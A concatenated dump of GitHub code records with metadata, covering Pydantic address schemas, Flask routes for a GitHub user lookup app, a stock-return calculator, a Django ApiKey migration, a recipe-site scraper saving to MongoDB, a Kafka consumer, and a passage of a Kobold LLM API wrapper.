"Sebsaurus/AR-VR-coursework", "sub_path": "test2.py", "file_name": "test2.py", "file_ext": "py", "file_size_in_byte": 3050, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "cv2.resize", "line_number": 22, "usage_type": "call"}, {"api_name": "cv2.INTER_AREA", "line_number": 22, "usage_type": "attribute"}, {"api_name": "cv2.resize", "line_number": 24, "usage_type": "call"}, {"api_name": "cv2.INTER_LINEAR", "line_number": 24, "usage_type": "attribute"}, {"api_name": "cv2.resize", "line_number": 26, "usage_type": "call"}, {"api_name": "cv2.INTER_CUBIC", "line_number": 26, "usage_type": "attribute"}, {"api_name": "cv2.VideoCapture", "line_number": 34, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 39, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 41, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 43, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", 
"line_number": 49, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 59, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 64, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 66, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 68, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 74, "usage_type": "call"}]} +{"seq_id": "21197000603", "text": "\"\"\"\nA module for address in the app-schemas package.\n\"\"\"\nfrom datetime import datetime\nfrom typing import Optional\nfrom uuid import uuid4\n\nfrom pydantic import UUID4, BaseModel, ConfigDict, Field\n\nfrom app.config.config import init_setting, sql_database_setting\n\n\nclass AddressID(BaseModel):\n \"\"\"\n Schema for representing an Address's ID.\n \"\"\"\n\n id: UUID4 = Field(\n default_factory=UUID4, title=\"ID\", description=\"ID of the Address\"\n )\n\n model_config = ConfigDict(\n json_schema_extra={\"example\": {\"id\": str(uuid4())}}\n )\n\n\nclass AddressUpdatedAt(BaseModel):\n \"\"\"\n Schema for representing the update timestamp of an Address.\n \"\"\"\n\n updated_at: Optional[datetime] = Field(\n default=None,\n title=\"Updated at\",\n description=\"Time the Address was updated\",\n )\n\n model_config = ConfigDict(\n json_schema_extra={\n \"example\": {\n \"updated_at\": str(datetime.now()),\n }\n },\n )\n\n\nclass AddressUpdate(BaseModel):\n \"\"\"\n Schema for the Address of a User.\n \"\"\"\n\n street_address: str = Field(\n ...,\n title=\"Street Address\",\n description=\"Full street address component, which may include house\"\n \" number, street name, Post Office Box, and multi-line\"\n \" extended street address information. This field ma\"\n \"y contain multiple lines, separated by newlines.\",\n min_length=3,\n )\n locality: str = Field(\n ...,\n title=\"Locality (City)\",\n description=\"City or locality component.\",\n min_length=3,\n max_length=85,\n )\n\n model_config = ConfigDict(\n json_schema_extra={\n \"example\": {\n \"street_address\": \"Blvd 9 de Octubre\",\n \"locality\": \"Guayaquil\",\n }\n },\n )\n\n\nclass AddressResponse(AddressUpdate):\n \"\"\"\n Schema for representing the Address of a User.\n \"\"\"\n\n region: str = Field(\n default=init_setting.DEFAULT_REGION,\n title=\"Region (State/Province)\",\n description=\"State, province, prefecture, or region component.\",\n min_length=4,\n max_length=35,\n )\n country: str = Field(\n default=init_setting.DEFAULT_COUNTRY,\n title=\"Country\",\n description=\"Country name component.\",\n min_length=4,\n max_length=60,\n )\n\n model_config = ConfigDict(\n json_schema_extra={\n \"example\": {\n \"street_address\": \"Blvd 9 de Octubre\",\n \"locality\": \"Guayaquil\",\n \"region\": init_setting.DEFAULT_REGION,\n \"country\": init_setting.DEFAULT_COUNTRY,\n }\n },\n )\n\n\nclass Address(AddressResponse):\n \"\"\"\n Schema for representing the Address for JWT.\n \"\"\"\n\n postal_code: Optional[str] = Field(\n None,\n title=\"Postal Code\",\n min_length=6,\n max_length=6,\n pattern=sql_database_setting.DB_POSTAL_CODE_CONSTRAINT,\n description=\"Postal code should be a 6-digit number.\",\n )\n\n model_config = ConfigDict(\n from_attributes=True,\n json_schema_extra={\n \"example\": {\n \"street_address\": \"Blvd 9 de Octubre\",\n \"locality\": \"Guayaquil\",\n \"region\": init_setting.DEFAULT_REGION,\n \"country\": init_setting.DEFAULT_COUNTRY,\n \"postal_code\": \"090312\",\n }\n },\n )\n\n\nclass UserAddressInDB(AddressID, Address, AddressUpdatedAt):\n \"\"\"\n 
Schema for updating the Address of a User.\n \"\"\"\n\n model_config = ConfigDict(\n from_attributes=True,\n json_schema_extra={\n \"example\": {\n \"id\": str(uuid4()),\n \"street_address\": \"Blvd 9 de Octubre\",\n \"locality\": \"Guayaquil\",\n \"region\": init_setting.DEFAULT_REGION,\n \"country\": init_setting.DEFAULT_COUNTRY,\n \"postal_code\": \"090312\",\n \"created_at\": str(datetime.now()),\n \"updated_at\": str(datetime.now()),\n }\n },\n )\n\n created_at: datetime = Field(\n default_factory=datetime.now,\n title=\"Created at\",\n description=\"Time the User was created\",\n )\n", "repo_name": "jpcadena/fastapi-boilerplate", "sub_path": "app/schemas/external/address.py", "file_name": "address.py", "file_ext": "py", "file_size_in_byte": 4270, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "pydantic.BaseModel", "line_number": 13, "usage_type": "name"}, {"api_name": "pydantic.UUID4", "line_number": 18, "usage_type": "name"}, {"api_name": "pydantic.Field", "line_number": 18, "usage_type": "call"}, {"api_name": "pydantic.UUID4", "line_number": 19, "usage_type": "name"}, {"api_name": "pydantic.ConfigDict", "line_number": 22, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 23, "usage_type": "call"}, {"api_name": "pydantic.BaseModel", "line_number": 27, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 32, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 32, "usage_type": "name"}, {"api_name": "pydantic.Field", "line_number": 32, "usage_type": "call"}, {"api_name": "pydantic.ConfigDict", "line_number": 38, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 41, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 41, "usage_type": "name"}, {"api_name": "pydantic.BaseModel", "line_number": 47, "usage_type": "name"}, {"api_name": "pydantic.Field", "line_number": 52, "usage_type": "call"}, {"api_name": "pydantic.Field", "line_number": 61, "usage_type": "call"}, {"api_name": "pydantic.ConfigDict", "line_number": 69, "usage_type": "call"}, {"api_name": "pydantic.Field", "line_number": 84, "usage_type": "call"}, {"api_name": "app.config.config.init_setting.DEFAULT_REGION", "line_number": 85, "usage_type": "attribute"}, {"api_name": "app.config.config.init_setting", "line_number": 85, "usage_type": "name"}, {"api_name": "pydantic.Field", "line_number": 91, "usage_type": "call"}, {"api_name": "app.config.config.init_setting.DEFAULT_COUNTRY", "line_number": 92, "usage_type": "attribute"}, {"api_name": "app.config.config.init_setting", "line_number": 92, "usage_type": "name"}, {"api_name": "pydantic.ConfigDict", "line_number": 99, "usage_type": "call"}, {"api_name": "app.config.config.init_setting.DEFAULT_REGION", "line_number": 104, "usage_type": "attribute"}, {"api_name": "app.config.config.init_setting", "line_number": 104, "usage_type": "name"}, {"api_name": "app.config.config.init_setting.DEFAULT_COUNTRY", "line_number": 105, "usage_type": "attribute"}, {"api_name": "app.config.config.init_setting", "line_number": 105, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 116, "usage_type": "name"}, {"api_name": "pydantic.Field", "line_number": 116, "usage_type": "call"}, {"api_name": "app.config.config.sql_database_setting.DB_POSTAL_CODE_CONSTRAINT", "line_number": 121, "usage_type": "attribute"}, {"api_name": "app.config.config.sql_database_setting", "line_number": 121, "usage_type": 
"name"}, {"api_name": "pydantic.ConfigDict", "line_number": 125, "usage_type": "call"}, {"api_name": "app.config.config.init_setting.DEFAULT_REGION", "line_number": 131, "usage_type": "attribute"}, {"api_name": "app.config.config.init_setting", "line_number": 131, "usage_type": "name"}, {"api_name": "app.config.config.init_setting.DEFAULT_COUNTRY", "line_number": 132, "usage_type": "attribute"}, {"api_name": "app.config.config.init_setting", "line_number": 132, "usage_type": "name"}, {"api_name": "pydantic.ConfigDict", "line_number": 144, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 148, "usage_type": "call"}, {"api_name": "app.config.config.init_setting.DEFAULT_REGION", "line_number": 151, "usage_type": "attribute"}, {"api_name": "app.config.config.init_setting", "line_number": 151, "usage_type": "name"}, {"api_name": "app.config.config.init_setting.DEFAULT_COUNTRY", "line_number": 152, "usage_type": "attribute"}, {"api_name": "app.config.config.init_setting", "line_number": 152, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 154, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 154, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 155, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 155, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 160, "usage_type": "name"}, {"api_name": "pydantic.Field", "line_number": 160, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 161, "usage_type": "attribute"}, {"api_name": "datetime.datetime", "line_number": 161, "usage_type": "name"}]} +{"seq_id": "40361375676", "text": "from app import app\nfrom flask import render_template, url_for, request, redirect\nfrom External_func import *\n\n@app.route('/', methods = ['POST', 'GET'])\ndef hello():\n \"\"\"Route for index page\n\n Args: None\n\n Returns: \n str: An index page for the API's website\n \"\"\"\n if request.method == 'POST':\n username = request.form['login']\n try:\n return redirect(url_for('userinfo', username = username))\n except:\n return \"No such user was found, please try another username\"\n else:\n return render_template('hello.html')\n\n@app.route('/userinfo/<username>.html')\ndef userinfo(username : str) -> str:\n \"\"\"Route for a web page dedicated to displaying found user info.\n\n Args:\n username (str) : Username of user whose Github information we want to acquire\n\n Returns:\n str: A webpage displaing all found data\n \"\"\"\n user_data = GetUserData(username)\n if user_data.get_login() == None:\n return redirect('/notfound.html')\n repos_list = GetAllRepos(username)\n lang_stats = AggregateLanguages(repos_list)\n return render_template('user_info.html', user = user_data, repos_list = repos_list, lang_stats=lang_stats)\n\n@app.route('/notfound.html')\ndef notfound() -> str:\n \"\"\"Route for a web page handling usernotfound error\n\n Args: None\n\n Returns: \n str: A web page informing client that user was not found \n \"\"\"\n return render_template('notfound.html')\n\n@app.route('/api.get.user/<username>')\ndef api_get_user(username : str) -> Dict:\n \"\"\"Route designated to serve user info as a json file\n\n Args:\n username (str): Login of a user whose info we want to acquire\n\n Returns:\n Dict: Json file containing all necessary information or an error message\n \"\"\"\n user_data = GetUserData(username)\n if user_data.get_login() == None:\n return {\n \"Error\" : \"No such user exists. 
Please try again\"\n }\n lang_stats = AggregateLanguages(GetAllRepos(username))\n return {\n \"login\" : user_data.get_login(),\n \"real name\" : user_data.get_name(),\n \"bio\" : user_data.get_bio(),\n \"used languages\" : lang_stats\n }\n\n@app.route('/api.get.repos/<username>')\ndef api_get_repos(username : str) -> str:\n \"\"\"Route designed to serve repo information for stated github user\n\n Args:\n username (str): Login of a user whose info we want to acquire\n\n Returns:\n Dict: Json file containing all necessary information or an error message \n \"\"\"\n repos_list = GetRawRepos(username)\n if len(repos_list) == 0:\n return {\n \"No repos error\" : \"No public repos were found for this user. Please try again\"\n }\n return repos_list\n", "repo_name": "mnb1188/Github-peeker", "sub_path": "routes.py", "file_name": "routes.py", "file_ext": "py", "file_size_in_byte": 2747, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "flask.request.method", "line_number": 14, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 14, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 15, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 15, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 17, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 17, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 21, "usage_type": "call"}, {"api_name": "app.app.route", "line_number": 5, "usage_type": "call"}, {"api_name": "app.app", "line_number": 5, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 35, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 38, "usage_type": "call"}, {"api_name": "app.app.route", "line_number": 23, "usage_type": "call"}, {"api_name": "app.app", "line_number": 23, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 49, "usage_type": "call"}, {"api_name": "app.app.route", "line_number": 40, "usage_type": "call"}, {"api_name": "app.app", "line_number": 40, "usage_type": "name"}, {"api_name": "app.app.route", "line_number": 51, "usage_type": "call"}, {"api_name": "app.app", "line_number": 51, "usage_type": "name"}, {"api_name": "app.app.route", "line_number": 74, "usage_type": "call"}, {"api_name": "app.app", "line_number": 74, "usage_type": "name"}]} +{"seq_id": "7229482263", "text": "import json\nimport os\nimport pandas\n\n\ndef createJSON():\n # This code calculates the accumulated percentage of returns\n print(\"Input the starting date\")\n currentYear, currentMonth = inputDate()\n\n print(\"Input the percentages month by month\")\n print(\"Type a non number to stop entering percentages - format is 8.15%\")\n\n percentages = []\n jsonData = []\n while True:\n try:\n percentage = float(input(\"{0}-{1}: \".format(currentYear, currentMonth))) / 100\n percentages.append(percentage)\n\n jsonData.append({\"date\": \"{0}-{1}-{2}\".format(currentYear, currentMonth, 1), \"return\": percentage})\n currentYear, currentMonth = incrementDates(currentYear, currentMonth)\n except ValueError:\n print(\"Do you wish to stop entering percentages?\")\n print(\"Type 'y' to exit, anything else to continue.\")\n if 'y' in input(\"Confirm: \").lower():\n break\n saveJSON(jsonData)\n print(\"\\nAll inputs for verification purposes\")\n print(percentages)\n\n\ndef analiseJSON(dataList=None):\n if dataList is None:\n dataList = 
openJSON()\n\n numberOfYears = round(len(dataList) / 12, 2)\n print(\"\\nData is {0} years old\".format(numberOfYears))\n totalReturn = round(getTotalReturn(dataList) * 100, 2)\n monthlyReturn = round(getAverageReturn(dataList) * 100, 2)\n print(\"\\nAll time\")\n print(\"Total return: {0}%\\nAverage monthly return: {1}%\\n\".format(totalReturn, monthlyReturn))\n if numberOfYears > 5:\n totalReturn = round(getTotalReturn(dataList, months=60) * 100, 2)\n monthlyReturn = round(getAverageReturn(dataList, months=60) * 100, 2)\n print(\"\\nPast 5 years\")\n print(\"Total return: {0}%\\nAverage monthly return: {1}%\\n\".format(totalReturn, monthlyReturn))\n if numberOfYears > 1:\n totalReturn = round(getTotalReturn(dataList, months=12) * 100, 2)\n monthlyReturn = round(getAverageReturn(dataList, months=12) * 100, 2)\n print(\"\\nPast year\")\n print(\"Total return: {0}%\\nAverage monthly return: {1}%\\n\".format(totalReturn, monthlyReturn))\n\n\ndef getTotalReturn(dataList, months=0):\n total = 1\n\n i = 0\n for data in reversed(dataList):\n total = total * (1 + data[\"return\"])\n i += 1\n if i == months:\n break\n return total\n\n\ndef getAverageReturn(dataList, months=0):\n pastXMonths = dataList[-months:]\n sumOfReturn = 0\n for monthlyReturn in pastXMonths:\n sumOfReturn += monthlyReturn[\"return\"]\n averageReturn = sumOfReturn / len(pastXMonths)\n return averageReturn\n\n\ndef inputDate():\n date = input(\"Enter date in YYYY-MM format: \")\n year, month = map(int, date.split('-'))\n # return datetime.date(year, month, 1)\n return year, month\n\n\ndef incrementDates(year, month, incrementInMonth=1):\n month += incrementInMonth\n if month > 12:\n month -= 12\n year += 1\n return year, month\n\n\ndef saveJSON(data, name=None):\n if name is None:\n name = input(\"Input a filename: \")\n name = name.replace(\".json\", \"\")  # str.replace returns a new string, so keep the result\n name += \".json\"\n with open(name, 'w') as outfile:\n json.dump(data, outfile)\n\n\ndef openJSON(name=None):\n global dataDir\n if name is None:\n jsonFiles = getJSONs()\n option = menu(jsonFiles, title=\"Input a filename\")\n name = dataDir + jsonFiles[option]\n elif dataDir not in name:\n name = dataDir + name\n\n with open(name) as json_file:\n try:\n jsonAsDict = json.load(json_file)\n print(\"\\nOpened: {0}\".format(name))\n except json.JSONDecodeError:\n print(\"\\nFile '{0}' is not valid JSON\".format(name))\n jsonAsDict = {}\n return jsonAsDict\n\n\ndef plotGraph():\n xAxis = []\n dataList = []\n\n # Choose data to plot\n while True:\n jsonNames = getJSONs()\n jsonNames.insert(0, \"Finish adding data\")\n option = menu(jsonNames)\n if option == 0:\n break\n else:\n filename = jsonNames[option]\n dataList.append(openJSON(filename))\n\n print(dataList)\n\n\ndef convertJSONtoPandas():\n data = {}\n jsonFiles = getJSONs()\n longestJSON = {\"size\": 0, \"name\": \"NAN\"}\n\n # Collect data\n for file in jsonFiles:\n name = file.replace(\".json\", \"\")\n jsonFile = openJSON(file)\n\n # Change the key 'return' for every bit of data\n for month in jsonFile:\n value = month.pop(\"return\")\n month[name] = str(round(value, 4))\n\n data[name] = jsonFile\n\n if len(jsonFile) > longestJSON[\"size\"]:\n longestJSON[\"size\"] = len(jsonFile)\n longestJSON[\"name\"] = name\n\n # Use the longest json file to create dates\n # Iterate through each date in the longest json\n sortedData = []\n for longestMonth in data[longestJSON[\"name\"]]:\n newDict = {\"date\": longestMonth[\"date\"]}\n\n for jsonFile in jsonFiles:\n name = jsonFile.replace(\".json\", \"\")\n for month in data[name]:\n if 
newDict[\"date\"] == month[\"date\"]:\n newDict[name] = month[name]\n\n sortedData.append(newDict)\n\n df = pandas.DataFrame(data=sortedData)\n print(df)\n df.to_csv(path_or_buf=\"data.csv\")\n\n\ndef getJSONs():\n global dataDir\n # returns a list of JSONs\n jsonFiles = []\n dirList = os.listdir(dataDir)\n for file in dirList:\n if \".json\" in file:\n jsonFiles.append(file)\n\n return jsonFiles\n\n\ndef main():\n menuList = [\"Create JSON\", \"JSON analysis\", \"Plot Data\", \"Convert json to pandas\"]\n functionsList = [createJSON, analiseJSON, plotGraph, convertJSONtoPandas]\n menu(menuList, title=\"Menu\", functions=functionsList)\n\n\ndef menu(menuList, title=None, functions=None):\n # Todo run functions if it exists as an option\n\n menuItems = menuList.copy() # This separates the two variables\n menuItems.insert(0, \"Exit\")\n print(\"\")\n if title is not None:\n print(\"{0} {1} {0}\".format(\"=\" * 5, title))\n for i in range(len(menuItems)):\n print(\"{0}\\t{1}\".format(i, menuItems[i]))\n option = inputInt(prompt=\"Option: \")\n if 0 <= option < len(menuItems):\n if option == 0:\n exit()\n else:\n # Everything is valid\n selectedOption = option - 1\n if functions is None:\n return selectedOption\n else:\n functions[selectedOption]()\n return selectedOption\n\n else:\n option = invalidMenuSelection(menuItems)\n\n return option\n\n\ndef inputInt(prompt=\"Input: \"):\n while True:\n try:\n inputtedInt = int(input(prompt))\n return inputtedInt\n except ValueError:\n print(\"Invalid input\")\n\n\ndef invalidMenuSelection(menuList):\n # Remove \"exit\" from list\n menuList.pop(0)\n print(\"Invalid selection\")\n return menu(menuList)\n\n\nif __name__ == '__main__':\n dataDir = \"data/\"\n while True:\n main()\n", "repo_name": "veryheavypickle/stockReturnCalculator", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 6983, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "json.dump", "line_number": 97, "usage_type": "call"}, {"api_name": "json.load", "line_number": 111, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 172, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 181, "usage_type": "call"}]} +{"seq_id": "17572499932", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='ApiKey',\n fields=[\n ('id', models.AutoField(serialize=False, verbose_name='ID', auto_created=True, primary_key=True)),\n ('key', models.CharField(blank=True, max_length=128, db_index=True, default='')),\n ('created', models.DateTimeField(auto_now_add=True)),\n ('user', models.OneToOneField(related_name='api_key', to=settings.AUTH_USER_MODEL, on_delete=models.CASCADE)),\n ],\n ),\n ]\n", "repo_name": "lovasb/django-restify", "sub_path": "restify/migrations/0001_initial.py", "file_name": "0001_initial.py", "file_ext": "py", "file_size_in_byte": 817, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "django.db.migrations.Migration", "line_number": 8, "usage_type": "attribute"}, {"api_name": "django.db.migrations", "line_number": 8, "usage_type": "name"}, {"api_name": 
"django.db.migrations.swappable_dependency", "line_number": 11, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 11, "usage_type": "name"}, {"api_name": "django.conf.settings.AUTH_USER_MODEL", "line_number": 11, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 11, "usage_type": "name"}, {"api_name": "django.db.migrations.CreateModel", "line_number": 15, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 15, "usage_type": "name"}, {"api_name": "django.db.models.AutoField", "line_number": 18, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 18, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 19, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 19, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 20, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 20, "usage_type": "name"}, {"api_name": "django.db.models.OneToOneField", "line_number": 21, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 21, "usage_type": "name"}, {"api_name": "django.conf.settings.AUTH_USER_MODEL", "line_number": 21, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 21, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 21, "usage_type": "attribute"}]} +{"seq_id": "10581910852", "text": "import random\nimport time\nimport os\n\nfrom bs4 import BeautifulSoup as bs\nfrom django.conf import settings\n\nfrom ..mongodb.mongo_client import mongo_client\nfrom .get_html_text import get_html_text, HTMLGetError\nfrom .base_dir import base_dir\n\n\ndef create_random_string():\n stings = \"ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890abcdefghijklmnopqrstuvwxyz\"\n random_string = \"\".join(random.sample(stings, 4))\n return f'{int(time.time())}-{random_string}'\n\n\ndef food_rank_parser(text):\n\n data = []\n soup = bs(text, \"html.parser\")\n # Get all records\n ranks = soup.find('div', attrs={'class': \"ui_newlist_1 get_num\"}).find_all('li')\n for rank in ranks:\n # Get the data of a single record\n description = rank.find('div', class_=\"pic\")\n detail = rank.find('div', class_=\"detail\")\n\n # Random id for food\n random_id = create_random_string()\n\n if \"blank.gif\" in description.a.img[\"src\"]:\n image_url = description.a.img[\"data-src\"]\n else:\n image_url = description.a.img[\"src\"]\n try:\n image = get_html_text(url=image_url, tag=False)\n time.sleep(0.1)\n except HTMLGetError as e:\n print(e)\n print(\"Failed to get the picture, skip this record\")\n continue\n else:\n # Write the picture to the file system\n path = os.path.join(base_dir, \"food_article\", random_id)\n if not os.path.isdir(path):\n os.makedirs(path)\n with open(os.path.join(path, 'sample.jpg'), 'wb') as f:\n f.write(image)\n\n # Get food name\n name = detail.h2.a.text.strip()\n # Get food details link\n food_detail_url = detail.h2.a[\"href\"]\n # Get the author of the food\n author = detail.find('p', class_=\"subline\").a.text\n # Get the food ingredient list\n ingredient_list = detail.find('p', class_=\"subcontent\").text\n\n data.append({\n \"name\": name,\n \"random_id\": random_id,\n \"image_path\": os.path.join(\"food_article\", random_id, 'sample.jpg'),\n \"food_detail_url\": food_detail_url,\n \"author\": author,\n \"ingredient_list\": ingredient_list,\n })\n\n return data\n\n\ndef run():\n rank_data = []\n for page in range(20, 51):\n print(f\"Getting page 
{page}'s data...\")\n food_rank_url = settings.FOOD_WEBSITE_RANKING_URL.format(page=page)\n\n if page == 1:\n refer_url = settings.FOOD_WEBSITE_REFERRER_URL\n else:\n refer_url = settings.FOOD_WEBSITE_RANKING_URL.format(page=page - 1)\n\n text = get_html_text(url=food_rank_url, refer_page=refer_url)\n data = food_rank_parser(text)\n rank_data.extend(data)\n print(f\"Data extraction on page {page} is complete!\")\n\n print(\"Done extracting data, starting to write data...\")\n\n client = mongo_client()\n for data in rank_data:\n client.food.food_rank.insert_one(data)\n # If you need to modify the serial number, you can directly call insert_many(rank_data)\n # The parameter passed in is a list, and the elements in the list are dictionary tables\n # client.food.food_rank.insert_many(rank_data)\n\n print(\"Data writing completed\")\n\n\nif __name__ == '__main__':\n run()\n", "repo_name": "khoaDLuu/food-always", "sub_path": "foodalways/apps/assist_function/data_crawler/food_rank_crawler.py", "file_name": "food_rank_crawler.py", "file_ext": "py", "file_size_in_byte": 3308, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "random.sample", "line_number": 15, "usage_type": "call"}, {"api_name": "time.time", "line_number": 16, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 22, "usage_type": "call"}, {"api_name": "get_html_text.get_html_text", "line_number": 38, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 39, "usage_type": "call"}, {"api_name": "get_html_text.HTMLGetError", "line_number": 40, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 46, "usage_type": "call"}, {"api_name": "base_dir.base_dir", "line_number": 46, "usage_type": "argument"}, {"api_name": "os.path", "line_number": 46, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 47, "usage_type": "call"}, {"api_name": "os.path", "line_number": 47, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path", "line_number": 49, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 64, "usage_type": "call"}, {"api_name": "os.path", "line_number": 64, "usage_type": "attribute"}, {"api_name": "django.conf.settings.FOOD_WEBSITE_RANKING_URL.format", "line_number": 77, "usage_type": "call"}, {"api_name": "django.conf.settings.FOOD_WEBSITE_RANKING_URL", "line_number": 77, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 77, "usage_type": "name"}, {"api_name": "django.conf.settings.FOOD_WEBSITE_REFERRER_URL", "line_number": 80, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 80, "usage_type": "name"}, {"api_name": "django.conf.settings.FOOD_WEBSITE_RANKING_URL.format", "line_number": 82, "usage_type": "call"}, {"api_name": "django.conf.settings.FOOD_WEBSITE_RANKING_URL", "line_number": 82, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 82, "usage_type": "name"}, {"api_name": "get_html_text.get_html_text", "line_number": 84, "usage_type": "call"}, {"api_name": "mongodb.mongo_client.mongo_client", "line_number": 91, "usage_type": "call"}]} +{"seq_id": "22406946407", "text": "from confluent_kafka import KafkaError\nfrom confluent_kafka import Consumer, KafkaException\n\nfrom aiokafka import AIOKafkaConsumer\nimport asyncio\n\n#Class for a consumer 
to listen to 'grammar-checked' kafka topic.\n\n\n\n\nclass MyConsumer:\n \n def __init__(self, loop) -> None:\n self.consumer = AIOKafkaConsumer(\n \"grammar-checked\",\n loop=loop,\n bootstrap_servers=\"localhost:9092\",\n group_id='grammar-checked'\n )\n \n topic = 'grammar-checked'\n \n async def consume(self, process_message):\n \n \n try:\n await self.consumer.start()\n print(\"Consuming\") \n \n except Exception as e:\n print(e)\n return\n \n \n try:\n async for msg in self.consumer:\n print(msg.value)\n await process_message(msg.value)\n \n finally:\n await self.consumer.stop()\n \n async def close(self):\n await self.consumer.stop()\n \n\n\n", "repo_name": "Eddie4k-code/grammar_checker_microservice_kafka", "sub_path": "UserInputService/Consumer/consumer.py", "file_name": "consumer.py", "file_ext": "py", "file_size_in_byte": 1043, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "86", "api": [{"api_name": "aiokafka.AIOKafkaConsumer", "line_number": 15, "usage_type": "call"}]} +{"seq_id": "6658182755", "text": "# Adapted from & credit to https://github.com/ausboss/Local-LLM-Langchain/tree/main\n\nfrom .base_llm import BaseLLM, LLMResponse\nfrom typing import Any, List, Mapping, Optional, Union\nfrom enum import Enum\nimport logging\nimport requests\n\nclass KoboldApiLLM(BaseLLM):\n    def __init__(self, api_url: str):\n        super().__init__()\n        self.kobold_api_url = api_url\n\n    @property\n    def _llm_type(self) -> str:\n        return \"custom\"\n\n    def get_response(self, prompt: str, stop: Optional[List[str]] = None) -> LLMResponse:\n        data = {\n            \"prompt\": prompt,\n            \"use_story\": False,\n            \"use_authors_note\": False,\n            \"use_world_info\": False,\n            \"use_memory\": False,\n            \"max_context_length\": 4000,\n            \"max_length\": 512,\n            \"rep_pen\": 1.12,\n            \"rep_pen_range\": 1024,\n            \"rep_pen_slope\": 0.9,\n            \"temperature\": 0.75,\n            \"tfs\": 0.9,\n            \"top_p\": 0.95,\n            \"top_k\": 0.6,\n            \"typical\": 1,\n            \"frmttriminc\": True,\n        }\n\n        # Add the stop sequences to the data if they are provided\n        if stop is not None:\n            data[\"stop_sequence\"] = stop\n\n        # Send a POST request to the Kobold API with the data\n        response = requests.post(f\"{self.kobold_api_url}/api/v1/generate\", json=data)\n\n        # Raise an exception if the request failed\n        response.raise_for_status()\n\n        # Check for the expected keys in the response JSON\n        json_response = response.json()\n        if (\n            \"results\" in json_response\n            and len(json_response[\"results\"]) > 0\n            and \"text\" in json_response[\"results\"][0]\n        ):\n            # Return the generated text\n            text = json_response[\"results\"][0][\"text\"].strip().replace(\"'''\", \"```\")\n\n            # Remove the stop sequence from the end of the text, if it's there\n            if stop is not None:\n                for sequence in stop:\n                    if text.endswith(sequence):\n                        text = text[: -len(sequence)].rstrip()\n            \n            concat_response = f\"{prompt}\\n{text}\"\n            return LLMResponse(\n                response=text, concat_response=concat_response, cost=0\n            )\n        else:\n            raise 